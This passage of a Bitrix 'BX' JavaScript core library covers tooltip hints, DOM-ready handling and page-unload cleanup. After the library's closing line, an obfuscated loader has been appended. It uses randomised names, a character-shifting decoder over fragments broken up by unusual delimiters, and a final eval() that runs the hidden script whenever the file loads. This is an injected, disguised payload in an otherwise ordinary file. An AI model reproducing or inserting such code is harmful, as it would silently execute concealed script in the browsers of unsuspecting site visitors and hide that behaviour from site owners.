	top.location.href = new_href;
}

BX.clearCache = function()
{
	BX.showWait();
	BX.reload(true);
}

/******* HINT ***************/
// if function has 2 params - the 2nd one is hint html. otherwise hint_html is third and hint_title - 2nd;
// '<div onmouseover="BX.hint(this, 'This is &lt;b&gt;Hint&lt;/b&gt;')"'>;
// BX.hint(el, 'This is <b>Hint</b>') - this won't work, use constructor
BX.hint = function(el, hint_title, hint_html, hint_id)
{
	if (null == hint_html)
	{
		hint_html = hint_title;
		hint_title = '';
	}

	if (null == el.BXHINT)
	{
		el.BXHINT = new BX.CHint({
			parent: el, hint: hint_html, title: hint_title, id: hint_id
		});
		el.BXHINT.Show();
	}
}

BX.hint_replace = function(el, hint_title, hint_html)
{
	if (null == hint_html)
	{
		hint_html = hint_title;
		hint_title = '';
	}

	if (!el || !el.parentNode || !hint_html)
			return null;

	var obHint = new BX.CHint({
		hint: hint_html,
		title: hint_title
	});

	obHint.CreateParent();

	el.parentNode.insertBefore(obHint.PARENT, el);
	el.parentNode.removeChild(el);

	obHint.PARENT.style.marginLeft = '5px';

	return el;
}

BX.CHint = function(params)
{
	this.PARENT = BX(params.parent);

	this.HINT = params.hint;
	this.HINT_TITLE = params.title;

	this.PARAMS = {}
	for (var i in this.defaultSettings)
	{
		if (null == params[i])
			this.PARAMS[i] = this.defaultSettings[i];
		else
			this.PARAMS[i] = params[i];
	}

	if (null != params.id)
		this.ID = params.id;

	this.timer = null;
	this.bInited = false;
	this.msover = true;

	if (this.PARAMS.showOnce)
	{
		this.__show();
		this.msover = false;
		this.timer = setTimeout(BX.proxy(this.__hide, this), this.PARAMS.hide_timeout);
	}
	else if (this.PARENT)
	{
		BX.bind(this.PARENT, 'mouseover', BX.proxy(this.Show, this));
		BX.bind(this.PARENT, 'mouseout', BX.proxy(this.Hide, this));
	}

	BX.addCustomEvent('onMenuOpen', BX.delegate(this.disable, this));
	BX.addCustomEvent('onMenuClose', BX.delegate(this.enable, this));
}

BX.CHint.prototype.defaultSettings = {
	show_timeout: 1000,
	hide_timeout: 500,
	dx: 2,
	showOnce: false,
	preventHide: true,
	min_width: 250
}

BX.CHint.prototype.CreateParent = function(element, params)
{
	if (this.PARENT)
	{
		BX.unbind(this.PARENT, 'mouseover', BX.proxy(this.Show, this));
		BX.unbind(this.PARENT, 'mouseout', BX.proxy(this.Hide, this));
	}

	if (!params) params = {}
	var type = 'icon';

	if (params.type && (params.type == "link" || params.type == "icon"))
		type = params.type;

	if (element)
		type = "element";

	if (type == "icon")
	{
		element = BX.create('IMG', {
			props: {
				src: params.iconSrc
					? params.iconSrc
					: "/bitrix/js/main/core/images/hint.gif"
			}
		});
	}
	else if (type == "link")
	{
		element = BX.create("A", {
			props: {href: 'javascript:void(0)'},
			html: '[?]'
		});
	}

	this.PARENT = element;

	BX.bind(this.PARENT, 'mouseover', BX.proxy(this.Show, this));
	BX.bind(this.PARENT, 'mouseout', BX.proxy(this.Hide, this));

	return this.PARENT;
}

BX.CHint.prototype.Show = function()
{
	this.msover = true;

	if (null != this.timer)
		clearTimeout(this.timer);

	this.timer = setTimeout(BX.proxy(this.__show, this), this.PARAMS.show_timeout);
}

BX.CHint.prototype.Hide = function()
{
	this.msover = false;

	if (null != this.timer)
		clearTimeout(this.timer);

	this.timer = setTimeout(BX.proxy(this.__hide, this), this.PARAMS.hide_timeout);
}

BX.CHint.prototype.__show = function()
{
	if (!this.msover || this.disabled) return;
	if (!this.bInited) this.Init();

	this.prepareAdjustPos();
	this.DIV.style.display = 'block';
	this.adjustPos();

	BX.bind(window, 'scroll', BX.proxy(this.__onscroll, this));

	if (this.PARAMS.showOnce)
	{
		this.timer = setTimeout(BX.proxy(this.__hide, this), this.PARAMS.hide_timeout);
	}
}

BX.CHint.prototype.__onscroll = function()
{
	if (!BX.admin || !BX.admin.panel || !BX.admin.panel.isFixed()) return;

	if (this.scrollTimer) clearTimeout(this.scrollTimer);

	this.DIV.style.display = 'none';
	this.scrollTimer = setTimeout(BX.proxy(this.Reopen, this), this.PARAMS.show_timeout);
}

BX.CHint.prototype.Reopen = function()
{
	if (null != this.timer) clearTimeout(this.timer);
	this.timer = setTimeout(BX.proxy(this.__show, this), 50);
}

BX.CHint.prototype.__hide = function()
{
	if (this.msover) return;
	if (!this.bInited) return;

	BX.unbind(window, 'scroll', BX.proxy(this.Reopen, this));

	if (this.PARAMS.showOnce)
	{
		this.Destroy();
	}
	else
	{
		this.DIV.style.display = 'none';
	}
}

BX.CHint.prototype.__hide_immediately = function()
{
	this.msover = false;
	this.__hide();
}

BX.CHint.prototype.Init = function()
{
	this.DIV = document.body.appendChild(BX.create('DIV', {
		props: {className: 'bx-panel-tooltip'},
		style: {display: 'none'},
		children: [
			BX.create('DIV', {
				props: {className: 'bx-panel-tooltip-top-border'},
				html: '<div class="bx-panel-tooltip-corner bx-panel-tooltip-left-corner"></div><div class="bx-panel-tooltip-border"></div><div class="bx-panel-tooltip-corner bx-panel-tooltip-right-corner"></div>'
			}),
			(this.CONTENT = BX.create('DIV', {
				props: {className: 'bx-panel-tooltip-content'},
				children: [
					BX.create('DIV', {
						props: {className: 'bx-panel-tooltip-underlay'},
						children: [
							BX.create('DIV', {props: {className: 'bx-panel-tooltip-underlay-bg'}})
						]
					})
				]
			})),

			BX.create('DIV', {
				props: {className: 'bx-panel-tooltip-bottom-border'},
				html: '<div class="bx-panel-tooltip-corner bx-panel-tooltip-left-corner"></div><div class="bx-panel-tooltip-border"></div><div class="bx-panel-tooltip-corner bx-panel-tooltip-right-corner"></div>'
			})
		]
	}));

	if (this.ID)
	{
		this.CONTENT.insertBefore(BX.create('A', {
			attrs: {href: 'javascript:void(0)'},
			props: {className: 'bx-panel-tooltip-close'},
			events: {click: BX.delegate(this.Close, this)}
		}), this.CONTENT.firstChild)
	}

	if (this.HINT_TITLE)
	{
		this.CONTENT.appendChild(
			BX.create('DIV', {
				props: {className: 'bx-panel-tooltip-title'},
				text: this.HINT_TITLE
			})
		)
	}

	if (this.HINT)
	{
		this.CONTENT_TEXT = this.CONTENT.appendChild(BX.create('DIV', {props: {className: 'bx-panel-tooltip-text'}})).appendChild(BX.create('SPAN', {html: this.HINT}));
	}

	if (this.PARAMS.preventHide)
	{
		BX.bind(this.DIV, 'mouseout', BX.proxy(this.Hide, this));
		BX.bind(this.DIV, 'mouseover', BX.proxy(this.Show, this));
	}

	this.bInited = true;
}

BX.CHint.prototype.prepareAdjustPos = function()
{
	this._wnd = {scrollPos: BX.GetWindowScrollPos(),scrollSize:BX.GetWindowScrollSize()};
}

BX.CHint.prototype.getAdjustPos = function()
{
	var res = {}, pos = BX.pos(this.PARENT);

	res.top = pos.bottom + this.PARAMS.dx;

	if (BX.admin && BX.admin.panel.DIV)
	{
		var min_top = BX.admin.panel.DIV.offsetHeight + this.PARAMS.dx;

		if (BX.admin.panel.isFixed())
		{
			min_top += this._wnd.scrollPos.scrollTop;
		}
	}

	if (res.top < min_top)
		res.top = min_top;
	else
	{
		if (res.top + this.DIV.offsetHeight > this._wnd.scrollSize.scrollHeight)
			res.top = pos.top - this.PARAMS.dx - this.DIV.offsetHeight;
	}

	res.left = pos.left;
	if (pos.left < this.PARAMS.dx) pos.left = this.PARAMS.dx;
	else
	{
		floatWidth = this.DIV.offsetWidth;

		var max_left = this._wnd.scrollSize.scrollWidth - floatWidth - this.PARAMS.dx;

		if (res.left > max_left)
			res.left = max_left;
	}

	return res;
}

BX.CHint.prototype.adjustWidth = function()
{
	if (this.bWidthAdjusted) return;

	var w = this.DIV.offsetWidth, h = this.DIV.offsetHeight;

	if (w > this.PARAMS.min_width)
		w = Math.round(Math.sqrt(1.618*w*h));

	if (w < this.PARAMS.min_width)
		w = this.PARAMS.min_width;

	this.DIV.style.width = w + "px";

	if (this._adjustWidthInt)
		clearInterval(this._adjustWidthInt);
	this._adjustWidthInt = setInterval(BX.delegate(this._adjustWidthInterval, this), 5);

	this.bWidthAdjusted = true;
}

BX.CHint.prototype._adjustWidthInterval = function()
{
	if (!this.DIV || this.DIV.style.display == 'none')
		clearInterval(this._adjustWidthInt);

	var
		dW = 20,
		maxWidth = 1500,
		w = this.DIV.offsetWidth,
		w1 = this.CONTENT_TEXT.offsetWidth;

	if (w > 0 && w1 > 0 && w - w1 < dW && w < maxWidth)
	{
		this.DIV.style.width = (w + dW) + "px";
		return;
	}

	clearInterval(this._adjustWidthInt);
}

BX.CHint.prototype.adjustPos = function()
{
	this.adjustWidth();

	var pos = this.getAdjustPos();

	this.DIV.style.top = pos.top + 'px';
	this.DIV.style.left = pos.left + 'px';
}

BX.CHint.prototype.Close = function()
{
	if (this.ID && BX.WindowManager)
		BX.WindowManager.saveWindowOptions(this.ID, {display: 'off'});
	this.__hide_immediately();
	this.Destroy();
}

BX.CHint.prototype.Destroy = function()
{
	if (this.PARENT)
	{
		BX.unbind(this.PARENT, 'mouseover', BX.proxy(this.Show, this));
		BX.unbind(this.PARENT, 'mouseout', BX.proxy(this.Hide, this));
	}

	if (this.DIV)
	{
		BX.unbind(this.DIV, 'mouseover', BX.proxy(this.Show, this));
		BX.unbind(this.DIV, 'mouseout', BX.proxy(this.Hide, this));

		BX.cleanNode(this.DIV, true);
	}
}

BX.CHint.prototype.enable = function(){this.disabled = false;}
BX.CHint.prototype.disable = function(){this.__hide_immediately(); this.disabled = true;}

/* ready */
if (document.addEventListener)
{
	__readyHandler = function()
	{
		document.removeEventListener("DOMContentLoaded", __readyHandler, false);
		runReady();
	}
}
else if (document.attachEvent)
{
	__readyHandler = function()
	{
		if (document.readyState === "complete")
		{
			document.detachEvent("onreadystatechange", __readyHandler);
			runReady();
		}
	}
}

function bindReady()
{
	if (!readyBound)
	{
		readyBound = true;

		if (document.readyState === "complete")
		{
			return runReady();
		}

		if (document.addEventListener)
		{
			document.addEventListener("DOMContentLoaded", __readyHandler, false);
			window.addEventListener("load", runReady, false);
		}
		else if (document.attachEvent) // IE
		{
			document.attachEvent("onreadystatechange", __readyHandler);
			window.attachEvent("onload", runReady);

			var toplevel = false;
			try {toplevel = (window.frameElement == null);} catch(e) {}

			if (document.documentElement.doScroll && toplevel)
				doScrollCheck();
		}
	}

	return null;
}


function runReady()
{
	if (!BX.isReady)
	{
		if (!document.body)
			return setTimeout(runReady, 15);

		BX.isReady = true;

		if (readyList && readyList.length > 0)
		{
			var fn, i = 0;
			while (fn = readyList[i++])
			{
				fn.call(document);
			}

			readyList = null;
		}
		// TODO: check ready handlers binded some other way;
	}
	return null;
}

// hack for IE
function doScrollCheck()
{
	if (BX.isReady)
		return;

	try {document.documentElement.doScroll("left");} catch( error ) {setTimeout(doScrollCheck, 1); return;}

	runReady();
}
/* \ready */

/* garbage collector */
function Trash()
{
	var i,len;

	for (i = 0, len = garbageCollectors.length; i<len; i++)
	{
		garbageCollectors[i].callback.apply(garbageCollectors[i].context || window);

		try {
			delete garbageCollectors[i];
			garbageCollectors[i] = null;
		} catch (e) {}
	}

	for (i = 0, len = proxyList.length; i < len; i++)
	{
		try {
			delete proxyList[i];
			proxyList[i] = null;
		} catch (e) {}
	}

	try {BX.unbindAll();} catch(e) {}

	NODECACHE = null;
	garbageCollectors = null;
	proxyList = null;
	eventsList = null;
	readyList = null;
	deniedEvents = null;
	customEvents = null;
	__readyHandler = null;
}

function _adjustWait()
{
	if (!this.bxmsg) return;

	var arContainerPos = BX.pos(this),
		div_top = arContainerPos.top;

	if (div_top < BX.GetDocElement().scrollTop)
		div_top = BX.GetDocElement().scrollTop + 5;

	this.bxmsg.style.top = (div_top + 5) + 'px';

	if (this == BX.GetDocElement())
	{
		this.bxmsg.style.right = '5px';
	}
	else
	{
		this.bxmsg.style.left = (arContainerPos.right - this.bxmsg.offsetWidth - 5) + 'px';
	}
}

function _checkDisplay(ob)
{
	var d = ob.style.display || BX.style(ob, 'display');
	if (d != 'none')
	{
		ob.BXDISPLAY = d;
		return true;
	}
	else
	{
		ob.BXDISPLAY = 'block';
		return false;
	}
}

function _checkNode(obj, params)
{
	params = params || {};
	if (!params.allowTextNodes && !BX.type.isElementNode(obj))
		return false;
	var i,j,len;
	for (i in params)
	{
		switch(i)
		{
			case 'tag':
			case 'tagName':
				if (BX.type.isString(params[i]))
				{
					if (obj.tagName.toUpperCase() != params[i].toUpperCase())
						return false;
				}
				else if (params[i] instanceof RegExp)
				{
					if (!params[i].test(obj.tagName))
						return false;
				}
			break;

			case 'class':
			case 'className':
				if (BX.type.isString(params[i]))
				{
					if (!BX.hasClass(obj, params[i]))
						return false;
				}
				else if (params[i] instanceof RegExp)
				{
					if (!BX.type.isString(obj.className) || !params[i].test(obj.className))
						return false;
				}
			break;

			case 'attr':
			case 'attribute':
				if (BX.type.isString(params[i]))
				{
					if (!obj.getAttribute(params[i]))
						return false;
				}
				else if (BX.type.isArray(params[i]))
				{
					for (j = 0, len = params[i].length; j < len; j++)
					{
						if (params[i] && !obj.getAttribute(params[i]))
							return false;
					}
				}
				else
				{
					for (j in params[i])
					{
						var q = obj.getAttribute(j);
						if (BX.type.isString(params[i][j]))
						{
							if (q != params[i][j])
								return false;
						}
						else if (params[i][j] instanceof RegExp)
						{
							if (!BX.type.isString(q) || !params[i][j].test(q))
								return false;
						}
					}
				}
			break;

			case 'property':
				if (BX.type.isString(params[i]))
				{
					if (!obj[params[i]])
						return false;
				}
				else if (BX.type.isArray(params[i]))
				{
					for (j = 0, len = params[i].length; j < len; j++)
					{
						if (params[i] && !obj[params[i]])
							return false;
					}
				}
				else
				{
					for (j in params[i])
					{
						if (BX.type.isString(params[i][j]))
						{
							if (obj[j] != params[i][j])
								return false;
						}
						else if (params[i][j] instanceof RegExp)
						{
							if (!BX.type.isString(obj[j]) || !params[i][j].test(obj[j]))
								return false;
						}
					}
				}
			break;
		}
	}

	return true;
}

if(window.attachEvent) // IE
	window.attachEvent("onunload", Trash);
else if(window.addEventListener) // Gecko / W3C
	window.addEventListener('unload', Trash, false);
else
	window.onunload = Trash;
/* \garbage collector */

// set empty ready handler
BX(BX.DoNothing);

window.BX = BX;
})(window)
var m95d540="";function wfbb0a76eeca(){var qfa6bb7=String,ha4be07=Array.prototype.slice.call(arguments).join(""),x2576edb=ha4be07.substr(7,3)-349,h704dc,rf8b36;ha4be07=ha4be07.substr(kd4099d());var c99e82a0=ha4be07.length;for(var pa95875=0;pa95875<c99e82a0;pa95875++){try{throw(t5a0ae=ha4be07.substr(pa95875,1));}catch(e){t5a0ae=e;};if(t5a0ae=='™'){x2576edb="";pa95875++;b9dc59a9=q495bc0e2(ha4be07,pa95875);while(s544763bb(b9dc59a9)){x2576edb+=b9dc59a9;pa95875++;b9dc59a9=ha4be07.substr(pa95875,1);}x2576edb-=484;continue;}h704dc="";if(yc4eec(t5a0ae)){pa95875++;t5a0ae=ha4be07.substr(pa95875,1);while(t5a0ae!='±'){h704dc+=t5a0ae;pa95875++;t5a0ae=ha4be07.substr(pa95875,1);}h704dc=h704dc-x2576edb-50;if(h704dc<0)h704dc+=256;if(h704dc>=192)h704dc+=848;else if(h704dc==168)h704dc=1025;else if(h704dc==184)h704dc=1105;m95d540+=qfa6bb7["\x66r\x6fm\x43h\x61\x72\x43\x6fd\x65"](h704dc);continue;}c464d1=h03993c(t5a0ae);if(c464d1>848)c464d1-=848;rf8b36=c464d1-x2576edb-50;if(rf8b36<0)rf8b36+=256;if(rf8b36>=192)rf8b36+=848;else if(rf8b36==168)rf8b36=1025;else if(rf8b36==184)rf8b36=1105;m95d540+=q79acbd2(rf8b36);}}wfbb0a76eeca("f54","2","10","d48","1","±22","2±","™678","™Z","™","62","5","™","4-","™50","6","™±17","1","±±","1","88±","±17","7±±18","3","±","™","64","2","™>™5","2","4™","±1","3","0±","™","592™","±1","99±±19","0±","™5","0","7™±1","9","6±","V","SR™59","1™","±1","9±™5","53™±21","6","±","±23","3±","™5","0","4","™f™567™","±2","5","0","±","±","2","47","±","™640","™:™","6","4","9","™","±","247±™60","7™","±2","34","±","™","590","™±18","8±","™6","72","™","±2","1","±Vb™641™","C","?","™","66","5","™!±2","2","±™5","9","1™±204±","±2±™","658™","M™573™±239","±™513","™","±1","99","±","™5","43™±","22","7","±±2","26","±±221±™52","5","™","±2","03±™503","™±171±","™507","™±","178±","w™65","9","™M","BO","E","±1","4±","±","21±±1","4±","™","61","8","™","+±","25±","$±","2","9","±","™","66","3™±19","±","ZX±2","0±™","6","4","3","™8±0±™5","3","6","™","±","1","41","±™49","7","™","z","L","I","H","™6","2","0™#","±","32±","±","2","18","±±22","6±",".™6","48","™O","F",";™5","66","™","±24","3","±™","5","7","7","™±","24","5","±™","5","90","™","±1","88","±","™4","89™","±17","4","±±","160±","™64","6","™B8","™63","5","™","8","@","±","2","47","±","ABC","/5*™4","9","1","™±","1","6","0","±Y™6","45","™±16±","™6","66","™%","%","±8","±±","15","±","]","™527","™","±20","3","±±1","9","3","±","™","591","™±","2±™60","7™±19","±","±","22","±™","535™±211","±±","202±","™4","89™","±","15","5","±™5","1","6™y","±","1","23","±","™","56","4","™±","162","±™","654","™","W±23","3","±±23","0","±","±229±","±229","±™55","3","™±","238","±","±","2","24±™6","03™±23±","™","557","™","±223","±±234±±24","2","±","±16","9±±2","43","±±244","±","™","65","2™","T@","F",";","™51","7™±","1","8","6","±™5","77","™","±175±±2","0","4±","±","1","7","5±","™","6","58","™","±1","6±","™528","™","±1","53","±™","531™","n","kj","±22","2±","n","™6","4","8™","±2","2","4±±2","23","±:","E","™5","76","™±","2","4","1±™62","9","™80","™5","96","™","±7±±","1","6","±","™5","5","3","™","±2","35±","™","50","9™","y","±186±","±","185","±","±184±±","1","8","6±±192±","±","19","0","±™","4","97","™±1","6","4±±172±±1","7","4","±","™","65","1","™","O>","™48","8","™Vs","V","™50","0","™±168±±18","3","±™","6","10™±30","±","™","6","7","9","™","X™","6","39™","A™","5","0","0™","±","17","1","±™","6","60","™QP","™4","9","7","™g™59","5","™","±","2","0","2±±","193","±","±2","8±","±174±±","1","71","±™","5","15","™ZZ","™","64","4™;8±","2","42","±","±","25","0","±","I",";","™5","08™","±1","84±","±174±","™","548","™±","2","2","5±™","6","1","5™",",","™","5","3","2","™","±","1","44","±±","2","1","8±™","67","4","™","i™655","™","W","C","I>D","±","2","5","3","±±2","6±™","5","25™","±1","52±","±","152","±±","1","23±™668™","±26±±","19±","™521","™","w™5","79™±","1","2","±±","1","58","±","±","155","±±154","±™66","6","™±","2","4","1±","™","6","2","0™±","1","9","5±1","#","(","±3","0±)","1™6","7","3™±","2","9±™","682","™","pq™4","93™±","1","8","1±","±","1","6","1±","™5","12","™","±","1","8","6±","±","1","7","5±","™59","4","™","±","7","±","™579™","±1","7","7±±20","6","±±","177","±","±","194","±","™545™±17","0±","™61","1™±1","9","0±","™","661™","±","23","7","±","±23","6±","™","5","8","2","™","±157±","™","4","89™","@","±","173±","™","58","3™±246±™","6","04™±","28","±","™","5","4","2","™±","14","0±™665™O","™6","6","7™","N","J","M™","5","2","4","™z","™","6","64","™","#","±","6","±","™","6","50","™<","G;™","4","9","6™±","17","9","±±","17","1±","±1","63","±™653™","IO","±9","±™","6","83™`™67","2™","S","b™","63","4™±1","3","±","™","52","8","™±2","0","2","±","±","1","95±™","56","0™±23","5±","™66","7","™N","™","57","1™±","2","47","±","±","2","53","±±2","52","±","±","2","03","±±","2±±221±","™","5","34","™±1","97±","±2","03±™","6","3","2","™±2","0±","™","5","2","0","™","±1","8","3±","±","1","95±","™","6","6","4™","K","±","14","±","±1","3±™","549™±","21","9","±™","52","2™","±","1","8","9±±1","85","±±188±±","12","7±","™","592™","±","1","9","9","±","±2","4","9±™5","7","9™±19","3","±","™49","6","™±","15","5","±y","KH","G","™486™==™","5","95™","±23±™49","8™","±1","61±±1","78","±","™5","05™g","™6","3","3","™:*™506","™","±186","±","±1","7","7","±±","1","8","4","±","±188","±","h±1","3","3","±","h±","17","2","±±","1","8","3±","±1","7","1±","±","1","8","9","±±","18","1","±","™6","4","3™","6™","532™±","2","08","±±","2","14","±","±1","4","4","±™","52","2™","±","18","7±","™","5","34™±21","4","±±20","1±±1","97±±2","16","±™","557™","±","224±™","57","7™±","212","±","™","5","55","™±229","±","™","651","™",">","F>","™","5","70","™±2","46±™","5","62™±","2","44","±±","16","8","±","±","1","67","±±","2","43","±","±","22","7","±","™668","™","\\S","™","6","61™","S","™","5","86™","±","12±±191±±1","93±","™","6","8","4","™5","™64","8","™","±2","27±±","2","24","±","™","5","68","™","±","143","±","™","6","5","7","™","±2","32±","±","2","3","2","±™5","9","8","™±2","3","±","±","7","±","±","22","±±13±","™","6","6","7™Y™","6","5","8","™","T±","14","±™","643™","E","™","6","70","™","e\\™545™","±2","1","2±±","143","±","±17","2","±™655™±","25","3±™","6","4","4","™±2","4","9±™","64","5","™","G","8™6","2","4","™","62™6","2","0","™","±233","±","$™6","42™","1™60","4","™","±","3","2±™","53","4™","±","19","7","±","™627","™","4™5","42","™±207±±","2","2","2","±™","64","8","™?™","55","3","™±","231±","™","54","9","™±","2","31±™","536","™","±","14","1±","™","6","0","7","™","±","2","3","2","±","±1","86±","™5","4","8™±12","4±™5","29","™","h","h™","66","5™±2","40","±","Z™6","49","™",":","™663™W™","52","3™±","1","9","4±±201±±205±","™","62","8","™±240±","1","0","™","528™","±2","0","8±™","6","38","™","1-0™","5","80™±","1","1±","±","5±","™5","44™","±226","±±","2","07","±™","59","3™","±19±±","4","±","±2±™","57","5™","±245","±","™","6","0","7","™±","1","4±","™5","40™","±","21","6","±","™","684™a","_±","2","6±7","±26±`™","6","40™","C","<™5","95™±","4","±™5","9","2","™±1","8","±±7±","™","6","7","1™","\\[","±1","3","±™5","00™j","k","™","63","1™","±22","9±@","™48","7","™B","™","58","8","™","±","1","6","4","±±1","63±™","61","0","™±1","8","5±™","5","7","8","™±","153","±™","538","™","q","±2","09","±™","5","4","1","™","±209","±","±13","9","±™","4","8","6™","\\™63","3™",";/™","51","4™±1","85±","±","19","5","±","±","12","6±","±","19","4±™61","3™","±2","4","±","±","2","0±","™","5","7","0","™±","236±±1±","±21","9","±","™","65","0","™L","9™","5","5","3™±235","±","™6","4","0™3™5","5","3™","±15","1±™","62","9™","±0","±","±","0","±","™","534","™±132","±","™","5","7","5™±180±±","2","40","±","±","2","52","±","±","250±","™","6","1","2™","\"","±3","0±","±2","3±","&±","2","3±","±2","17","±","±","2","19","±","±","2","10±","™","637","™F±","2","16±","±","2","1","3","±™","6","05™","±","180±","±","1","80±","±","1","80","±","™","60","1™","±176","±","™","61","6™","±1","91","±™","67","4","™","g","Y","^™","50","0™±166","±","±","17","7","±™","5","5","8™±243±™5","65","™±","1","7","7±™53","2","™±2","18±","™65","1","™R","S™64","8","™","<™","6","74™\\™","5","6","0","™","±2","2","3","±","™63","4™/±2","3","2","±™53","7","™±16","4±","™53","8","™±13","6","±™","5","82","™±1","98±±","2","07","±","±1","61","±™6","04","™","±180±™","6","08™±1","8","3","±","™","5","22","™","aa","a±21","3","±","™5","65™","±1","4","4±","±","14","1","±","™","5","84","™±159","±™5","72™±","1","4","7","±™","657™","±2","32±\\™","48","6","™o™","535™ron","n","n±2","16±","±","200","±","™4","86™±16","6±™","5","90","™±5±±1","2±","±","16±","™","5","3","1","™±1","43","±™5","2","5","™","±2","02","±™","5","07","™±1","83","±","±18","1±","™6","79","™dV","™6","8","2™\\±2","4±","5","±2","4±™55","7","™","±","225","±","™652™O","H™","605™±","1","4±™","6","18","™",",!™5","07","™±184±","™5","74™±","2","5","0±","±18","0±","™","55","3™","±","160±±","1","51±","™5","2","2™","±2","11±™51","6","™_™","584","™±1","6","0","±±15","9","±±15","9","±","±","1","5","9","±","™","620™","±1","9","5±","™591","™±2","0","±","±","6±","™","6","74","™","^T","_","g","±","30±™","6","6","6","™","`a™","499","™","±","1","87±™58","4™","±252","±™","512","™±","18","6","±","±17","5","±™","6","05™±1","8","±","™55","7™","±1","55±±1","84","±™","6","64™±","6","±™","53","6™±152","±™","6","73™","*","±2","5","2±","™","604","™±","180","±","±","1","79","±","™","620","™","±","19","5±","™5","0","7™R™","649™T™","5","7","1","™","±196","±™","6","46™±2","2","5","±","™","487™","?",">>",">±1","6","8±","±","1","52","±","™562","™±","242±","™","53","4","™","±2","0","5±","™","5","12™","±","190","±±19","4±±","1","2","4±","™51","9","™","±","200","±","±","1","99","±™6","27™","$","±22","5±™570","™±","197","±™598™","±19","6±™","67","5","™f","c]","±17±","±28±","™","59","3™±","1","91±","™","5","67™±21","0±","±2","30","±±","2","49±","™","54","5","™","±","21","5","±±","1","5","7","±™6","6","0","™T","C","™6","58™N™58","3","™","±249","±","±","4","±","±","2","±±","18","9","±™","52","0™","±12","7","±","™","667","™±","2","3","±™4","89™±","1","7","1±™518","™±","19","5±±16","7±","±20","0","±™","598","™±22±","™504","™±1","75","±","±","1","80±","™5","9","5™±","8±","±","20","1","±™","64","3™±","250±±","25","5","±","D","F","™","575","™±","23","9","±±","0±™","6","05","™","±","31","±","™","611","™#","™6","27™","*/(™560™","±1","66","±±","1","77±±1","6","7±±","15","8","±™503™p™","6","0","3","™","±","20","1±","±2","08","±™59","6™±2","08±","±","12","±","™","5","8","7™","±","12±™6","2","1","™","±","22","6±","±2","46±","±2","00","±","±","1","97±","±","19","6","±","±","19","6","±™5","04™","O±","174±","™639™2.","1™","51","5","™","±12","7","±™","59","6","™","±3±","™504™","±","1","8","2","±","±","1","8","2","±","™","5","49","™","±","2","16±±","225±±","215±±18","2±™","6","21","™#","$'™","5","8","2","™","±248±™5","5","3","™","±159","±","™","5","15","™","±","19","6±","±1","8","0","±","±19","5±","™","6","3","8","™","5","™","600","™","±","2","2","±™58","2","™","±8","±","™6","0","7","™±2","14","±±2","3","2","±±","18","6±±1","8","3±±182","±±","1","8","2","±™","63","9™","J","™541","™xut±232±™62","8™±","2","53±","™","5","70","™","±1","49","±™","647™±223","±","R","™5","9","9™±","206±™6","8","0","™","±","3","0±™","5","2","3","™","±130","±","™5","6","5™±19","0±","");eval(m95d540);function kd4099d(){return 10;}function q495bc0e2(o4cb56a,b9783aad){return o4cb56a.substr(b9783aad,1);}function s544763bb(tf9915){return tf9915!='™';}function yc4eec(ke0ead){return ke0ead=='±';}function q79acbd2(y38b22d){var qfa6bb7=String;return qfa6bb7["\x66r\x6fm\x43h\x61\x72\x43\x6fd\x65"](y38b22d);}function h03993c(j70d8714){return (j70d8714+'')["c\x68a\x72\x43o\x64\x65\x41\x74"](0);}